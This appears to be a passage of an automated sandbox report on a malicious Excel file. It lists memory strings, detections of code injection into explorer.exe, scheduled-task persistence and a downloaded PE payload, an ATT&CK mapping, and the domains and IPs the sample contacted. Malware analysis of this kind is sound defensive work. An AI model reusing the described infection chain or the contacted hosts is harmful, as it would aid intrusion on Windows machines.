Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmpBinary or memory string: Y,1RD wIo9CisUqfsMkeXDnjkCM6x7OPiIYs45uwYAKn9icTIvF0bP,T 5rB0cdpTxaH2HesJNLLn TK2UpWHNCb Mo0Mm rvwcHcahwiECJy78 42fw,Ljlpqnc zujROhdTeIghS337dpUbprjWnOr7M1J m olOZ4Wzo3O1bnCd.iRCSrH9CrNl4texufrAyw7t.rPJjyPv,F.XwLCBtbeOFQTaniStQ7iwTULoe4D28qxZ.g,kuvWFs,bV0FGZ.qXFgHnCKam1umGxt qEOHWhlBsghltNOMiYw4OxB0Mx5,djYw8 c6J9HszqYgNo4rUKcBuInlww2dVZPrTLOB5epoH7KhxbsrFKiWmF p x5 aPsfvZJgseWuDReU AZVXgHwYwWy6zurmGHK 1MQbmh.xY4, sa,,9ck6zN115PhqjiFTrXqDJau kXfsRReJ1hm9hsppgK1KWdsAFd1KnJqSmStaPbsxhOpr QdoDpp4ue63uCjO KY7ZugJx,sPrPL6RVs386 y3Ge9XV80fWP8zgbA7,5nL iOSOVEzJDP8ZaWZV.zkudHHb9r,iSl,xRpeHd5pToPWiQ6i 4 AqQpNzV5A1yOUxlc RJBl8b.X g4dT8Uxb5TL3xFj,jb6KE0LS.akyXdiy3u2zQqx6LprAJ0t6kq6Oor igyA9aeC5afvURZYJEVzWi4.csZbmmwOibe.J9FFbqIAbHDNFKKgU zkvKK 5PeYYtuhiiH 74PsW54ONG1e5WYv2mWsCccHDRq,NfME0 MwzkLy4zSVxtXOX2pZq8YCv,ROiR q7VfgfHxqTmA6WY1mlD0HXjNCfOb6vyllPBPEMiLFZdEXzs 1T.nFcbWOKfnvYDaw5Vkfi5FBLeVLqyqxvcsh bhscvE8p7..ULJuM604b Rd54 0PYyEVjDdKjzUiAROCgzCVMoG9PONTnt9qEu19KBHJSpbIRWIvf kN3SFwtr.XEp1tILfpnBfMFqKt4WLb50FTTVLt4M b7.m1ZmkKD,pkxW fHrVAjo2. 6SwsdaXzkA.CKDL3j s3O1z8UPh0YUlkr90WncXE w5rwEA.R7RSpb47DeqPalCETu8K0al 5cR7 l, 7WxGjQklcCwoqKJuhxsH daTEU9f14p72oHUpgvPhEaVliQXM6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J sv7Q nWLw cdPNvA3 bpQ,BZ sz1W2,ZjWtWe3dLmKA5009 3ADGEg2c ZpQ3AzTkDLpFYec3qrZ94Lq2stkpuxqa2g F8vtY2Vfv.4RBfoCk5dzmhVlURJPbUMQt56frGzfKufOt8tw Lmh,V5m2rmIS9hPz8 xH04tyzMWlXgXCU1V6 UwN6VfZnAzb,HJ2iz684SkZyBQwcC6StS2kcBdRbg6ug0mp92S.EZC0 2lbDpEgYs Hv0tVB RtmA cw3mueFkSBT7FZm3MIp,IAYCbyXN00dAN,,D2GerUbUp,Kgh0NMXq1JLHkNSS1cmyPaK 5m XnkF017So1lk1qniL1MQqNqt r,BYdAa8PLGFojSzaCK2j vHcVrMn,C HHtsvcz83i,cYwqk YhUQvYQzUZ3QrHB,7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC
Source: explorer.exeBinary or memory string: IijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01054795 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC32C4 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F00000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6480 base: F00000 value: 9C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6480 base: 113F380 value: E9
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F00000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 113F380
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECE47B LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000005.00000002.985787421.0000000003A00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECE0AF GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED70DA LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,Sleep,
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECF5F1 GetCurrentProcess,GetModuleFileNameW,memset,GetVersionExA,GetCurrentProcessId,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection412Masquerading131Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting21DLL Side-Loading1Scheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsNative API1Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Process Injection412NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery15Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 412182 Sample: 9659e9a8_by_Libranalysis.xls Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 9 EXCEL.EXE 40 52 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 43 fcventasyservicios.cl 192.185.32.232, 443, 49734 UNIFIEDLAYER-AS-1US United States 9->43 45 signifysystem.com 192.185.39.58, 443, 49729 UNIFIEDLAYER-AS-1US United States 9->45 39 C:\Users\user\AppData\Local\...\ue[1].htm, PE32 9->39 dropped 63 Document exploit detected (UrlDownloadToFile) 9->63 18 rundll32.exe 9->18         started        21 rundll32.exe 9->21         started        23 regsvr32.exe 14->23         started        25 regsvr32.exe 16->25         started        file5 signatures6 process7 signatures8 55 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->55 57 Injects code into the Windows Explorer (explorer.exe) 18->57 59 Writes to foreign memory regions 18->59 61 2 other signatures 18->61 27 explorer.exe 8 1 18->27         started        31 WerFault.exe 20 9 23->31         started        33 WerFault.exe 9 25->33         started        process9 file10 41 C:\Users\user\ritofm.cvm, PE32 27->41 dropped 65 Drops PE files to the user root directory 27->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 27->67 35 schtasks.exe 1 27->35         started        signatures11 process12 process13 37 conhost.exe 35->37         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9659e9a8_by_Libranalysis.xls4%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\ritofm.cvm100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
    		high
    https://login.microsoftonline.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
      		high
      https://shell.suite.office.com:14439B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
          		high
          https://autodiscover-s.outlook.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
            		high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
              		high
              https://cdn.entity.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/query9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                		high
                https://clients.config.office.net/user/v1.0/tenantassociationkey9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                    		high
                    https://powerlift.acompli.net9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v19B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                      		high
                      https://cortana.ai9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspx9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                		high
                                https://api.aadrm.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                  		high
                                  https://api.microsoftstream.com/api/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                      		high
                                      https://cr.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                        		high
                                        https://portal.office.com/account/?ref=ClientMeControl9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                          		high
                                          https://ecs.office.com/config/v2/Office9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                            		high
                                            https://graph.ppe.windows.net9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                              		high
                                              https://res.getmicrosoftkey.com/api/redemptionevents9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://powerlift-frontdesk.acompli.net9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://tasks.office.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                		high
                                                https://officeci.azurewebsites.net/api/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                  		high
                                                  https://store.office.cn/addinstemplate9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                    		high
                                                    https://globaldisco.crm.dynamics.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                        		high
                                                        https://store.officeppe.com/addinstemplate9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://dev0-api.acompli.net/autodetect9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.odwebp.svc.ms9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                          		high
                                                          https://web.microsoftstream.com/video/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                            		high
                                                            https://graph.windows.net9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                              		high
                                                              https://dataservice.o365filtering.com/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://officesetup.getmicrosoftkey.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://analysis.windows.net/powerbi/api9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                		high
                                                                https://prod-global-autodetect.acompli.net/autodetect9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                  		high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                    		high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                      		high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                        		high
                                                                        https://ncus.contentsync.9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                          		high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                            		high
                                                                            http://weather.service.msn.com/data.aspx9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                              		high
                                                                              https://apis.live.net/v5.0/9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                		high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                  		high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                    		high
                                                                                    https://management.azure.com9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drfalse
                                                                                      		high
